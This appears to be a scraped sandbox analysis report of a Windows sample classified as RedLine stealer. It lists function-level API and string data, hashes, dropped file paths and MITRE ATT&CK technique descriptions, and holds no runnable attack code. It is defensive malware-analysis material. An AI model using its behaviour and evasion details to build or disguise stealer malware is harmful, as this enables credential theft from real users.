String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e3bb2c5ed9964e983958d327710e683502cd81c785aaf0511fe4d82b5558f7c5
Instruction ID: ee1e891483949693159fa094e3d4ed1d3ee13b11a760b63349eea98663a7d8bb
Opcode Fuzzy Hash: e3bb2c5ed9964e983958d327710e683502cd81c785aaf0511fe4d82b5558f7c5
Instruction Fuzzy Hash: D601F571A41128AB8B16FBA4CC51DFEB3ADEF66320B00460AF8619B2C5DA305D088660

Function 0031BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0031BC07

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

_wcscat.LIBCMT ref: 00353593

Strings

s=, xrefs: 0031BC47

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: s=
API String ID: 257928180-3091985080
Opcode ID: 002ddb17502a0910c2860a5d869c0638e5a543145d022caecbbda76d0ea70e5b
Instruction ID: be855595bb71b9ef174e484519aceab1c398527702fda7ca3a1f7dd55475cdbf
Opcode Fuzzy Hash: 002ddb17502a0910c2860a5d869c0638e5a543145d022caecbbda76d0ea70e5b
Instruction Fuzzy Hash: F311A535A042189BCB07EBA4E981EDEB7ACFF0C350F1000A6B945DB290EF7097C45B91

Function 0037934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00379367
__fread_nolock.LIBCMT ref: 0037937C

Strings

EA06, xrefs: 003793AE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 8e0b21b34f877ea9fa952beff45006cee9c7eaa613a72623c5b22e23f18c966e
Instruction ID: 1422eac59ca93e37a060075f2772652bfc5ae0e8a4a01b6f1224798f666f666b
Opcode Fuzzy Hash: 8e0b21b34f877ea9fa952beff45006cee9c7eaa613a72623c5b22e23f18c966e
Instruction Fuzzy Hash: DA01F9729042587EEB29C6A8CC56FFEBBFC9B01301F00429FF552D6181E578E6048B60

Function 003698B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00369923

Strings

ListBox, xrefs: 003698ED
ComboBox, xrefs: 003698C2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 4028a6d745f40bf7f58b7e8b45bf272c0c8e3e5ed4b929e03c9b394b5f70f4ac
Instruction ID: c5e323545ace8b07af3b0d549df497c19b229d9f251464bda45269521b5c14d9
Opcode Fuzzy Hash: 4028a6d745f40bf7f58b7e8b45bf272c0c8e3e5ed4b929e03c9b394b5f70f4ac
Instruction Fuzzy Hash: 5701F775E811186BCB16FBA0C952FFFB3AC9F25300F10401AB841A7285DA205F0896F1

Function 0036993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 003699A6

Strings

ListBox, xrefs: 00369972
ComboBox, xrefs: 00369947

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 1cd17f1a70b808f0ed75249b9f143a2710688af4242b031d3e7e6b6a03fbe63f
Instruction ID: 5fa1f4d49fcfc59c9101818c0ee89988c0e1cbdd02e92607408e587254c3ec3b
Opcode Fuzzy Hash: 1cd17f1a70b808f0ed75249b9f143a2710688af4242b031d3e7e6b6a03fbe63f
Instruction Fuzzy Hash: 7101A772A4111867CB16FBA4CA52FFFB3AC9F21340F14401AB845A7285DA244F0896B1

Function 00336D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00336DC0
__calloc_crt.LIBCMT ref: 00336DD9

Strings

@b=, xrefs: 00336DF0

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __calloc_crt
String ID: @b=
API String ID: 3494438863-2155352550
Opcode ID: dc2086d4ca4e5843d4000fbfe41b53232cb9ddde04b58249984d62560616bb4a
Instruction ID: 9c03ccf43ed324d980f74bc3f43ab5033bea00e2b8ebf535ee8c94ca0be9ba8e
Opcode Fuzzy Hash: dc2086d4ca4e5843d4000fbfe41b53232cb9ddde04b58249984d62560616bb4a
Instruction Fuzzy Hash: 39F04FB2309752AFE72B8B69FD927A52799E720724F51886BF100DE294F73488814684

Function 003754E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00375501
_wcscmp.LIBCMT ref: 00375513

Strings

#32770, xrefs: 0037550D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: e4ab7e9af218a3e164af65e495f8fd738ec9097d3906f7d2af9653c3d4291997
Instruction ID: bcc5b12758c4f64397d97366024716e456b5547e0a3463068474df1972fcea9a
Opcode Fuzzy Hash: e4ab7e9af218a3e164af65e495f8fd738ec9097d3906f7d2af9653c3d4291997
Instruction Fuzzy Hash: E3E0D17250022917D7219759BC45FA7F7ACDB55771F000157FD04D7051D571ED4587D0

Function 00350251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00350091

Part of subcall function 0038C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0035027A,?), ref: 0038C6E7
Part of subcall function 0038C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00350289

Strings

WIN_XPe, xrefs: 003500A4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: ada96bb75498b434d31b303a7710d4b9f504887c2b22f10ffe0985ba7eee8e95
Instruction ID: 48fec0831fb411495422628bad084a5e194371553f517f297bed3f0c1ab18f5c
Opcode Fuzzy Hash: ada96bb75498b434d31b303a7710d4b9f504887c2b22f10ffe0985ba7eee8e95
Instruction Fuzzy Hash: 43F0C071805109DFCB5BDB51C954BEC7BBCAB48301F141495E546B75A0CB725F88DF21

Function 00325800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,z=0z=,003D7A2C,003D7890,?,00325A53,003D7A2C,003D7A30,?,00000004), ref: 00325823

Strings

SZ2,z=0z=, xrefs: 00325804
,z=0z=, xrefs: 00325808, 00325821

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: DestroyIcon
String ID: ,z=0z=$SZ2,z=0z=
API String ID: 1234817797-2513326810
Opcode ID: 7c7346adbefbd3c5bd8999e8794ea464e86bbfbed105c08037e7ecb3926e0959
Instruction ID: 549c2eacafd96a900afd50e2aa289c60d98f33e6bc33a9a7156fcf48544f4a6d
Opcode Fuzzy Hash: 7c7346adbefbd3c5bd8999e8794ea464e86bbfbed105c08037e7ecb3926e0959
Instruction Fuzzy Hash: F9E0C232114216EBE7220F08E8007A4FBECAF21721F24C016E08056050D3F169A0DB90

Function 00379EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00379EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00379ECC

Strings

aut, xrefs: 00379EC6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 5d6c9f1233587c43872f8d0dcc786b0ac8eaf7337e322331453d5b94747edec9
Instruction ID: 23fcbeb231a299e70e3dd6770dc09adecdd189df1da20f2b8dfd446b64730306
Opcode Fuzzy Hash: 5d6c9f1233587c43872f8d0dcc786b0ac8eaf7337e322331453d5b94747edec9
Instruction Fuzzy Hash: 22D05E7554030DABDB51AB94DC0EFDABB2CDB14700F0046A1BE58910A2DB7159948B91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js

C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

C:\Users\user\AppData\Local\SecureData Technologies\Y

C:\Users\user\AppData\Local\Temp\684126\C

C:\Users\user\AppData\Local\Temp\684126\Intake.pif

C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe

C:\Users\user\AppData\Local\Temp\Defend

C:\Users\user\AppData\Local\Temp\Done

C:\Users\user\AppData\Local\Temp\Dow

C:\Users\user\AppData\Local\Temp\Drop

C:\Users\user\AppData\Local\Temp\Ever

C:\Users\user\AppData\Local\Temp\Haiti

C:\Users\user\AppData\Local\Temp\Judy

Windows Analysis Report
e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
